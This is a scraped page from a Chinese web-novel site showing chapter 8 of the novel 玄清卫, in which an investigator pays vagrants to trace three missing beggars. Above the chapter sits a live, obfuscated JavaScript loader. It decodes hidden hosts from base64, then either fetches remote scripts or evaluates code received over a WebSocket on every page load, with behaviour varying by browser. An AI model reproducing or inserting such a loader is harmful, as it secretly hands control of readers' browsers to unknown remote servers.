笔趣阁

字:
关灯 护眼
笔趣阁 > 玄清卫 > 第8章 头绪
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第8章 头绪

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
沈浩也没有想到自己出来溜一圈居然还真找到了新的头绪,而且正好接上那三具无名尸体的梗。
  之前沈浩猜测那三个被杀来凑数的尸体多半是五羊城里失踪的几个倒霉蛋。可从衙门反馈回来的消息却证实沈浩的猜测错了,衙门里近月来只有两起失踪案,而且和齐府里三具无名尸体对不上号。
  但仵作又说得清楚,这三具凑数的尸体其实只比齐府的人早死了半天时间,按理说也该是这五羊城里的人才对,为何被杀了却没有人道衙门报案失踪呢?直到他在油茶摊处看到了那两名流浪汉。
  油茶摊主的话中说了“二流子”和“很烦”,甚至称这些流浪汉为“土狗”,这些都提醒了沈浩,或许只有这些土狗是生是死才不会被别人在乎,更谈不上有谁会闲着无聊去衙门给几条“土狗”报失踪。
  如今只要在这些“土狗”里查查是不是有符合那三具尸体基本条件的人在这两天失踪就能确定这个猜测是不是正确。
  很幸运,这次沈浩没有猜错。
  “大人,很奇怪,另外那个和我们差不多年纪的人今天没有来。”
  “对对对,那人叫谢山,比我还大一些,恐怕六十五了都,平时都在慈安堂里吃饭的,这两天好像都没来。”
  “是呀,奇了怪了。”
  几个急着想要帮沈浩找到人的“土狗”非常郁闷,他们将整个慈安堂里里外外都找了一遍却并没有找到他们所说的“谢山”,这就意味着他们很可能没机会再拿到银子了。
  沈浩却是不急,而是继续道:“你们还想赚银子的话我这里还有一份差事,做不做?”
  “做!”
  “大人,您尽管吩咐就是!”
  沈浩:“那个谢山就算找不到也没关系,不过我要你们问清楚有谁最后一次见到他是在什么时候、在哪儿。另外,我还要找另外两个人,一个四十一岁左右,一个五十岁左右,他们和谢山一样很可能是最近突然不见了,你们帮我弄清楚的话这些都会是你们的。”
  沈浩颠着一袋碎银子,光是里面窸窸窣窣的钱响声就足够给这些“土狗”打鸡血了。
  ......
  半个时辰不到,消息就传回来了,一下让沈浩心情大好。
  “大人,您说得没错,除了谢山之外的确还有两个人突然不见了,四十出头的那人叫陈二牛,五十多的那人叫马九。”
  “还有之前的谢山,这三个人的情况我们都摸清楚了。”
  “您看是不是......”
  沈浩:“这点钱我不在乎,不过想要拿到手得先看看你们的消息够不够格,说吧,你们都打听到了些什么。”
  几人你一言我一语的很快就把他们打听到的消息全都倒了出来。
  谢山,六十五岁左右,身体一直不太好,平时都在慈安堂附近活动。最后一次被熟人看到是在两天前的早上,看到往城东方向在走。
  马九,五十岁左右,喜欢喝酒,讨要的钱都换酒喝了。最后一次被熟人看到同样是两天前的早上,一身酒气的往城东方向走。
  陈二牛的情况和前面两人差不多,最后一次被熟人看到也是两天前的早上,只不过这家伙好色,讨到钱就喜欢去窑子,而且就算没钱也常在窑子周边晃荡。而巧的是陈二牛去的那种窑子也是在城东。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师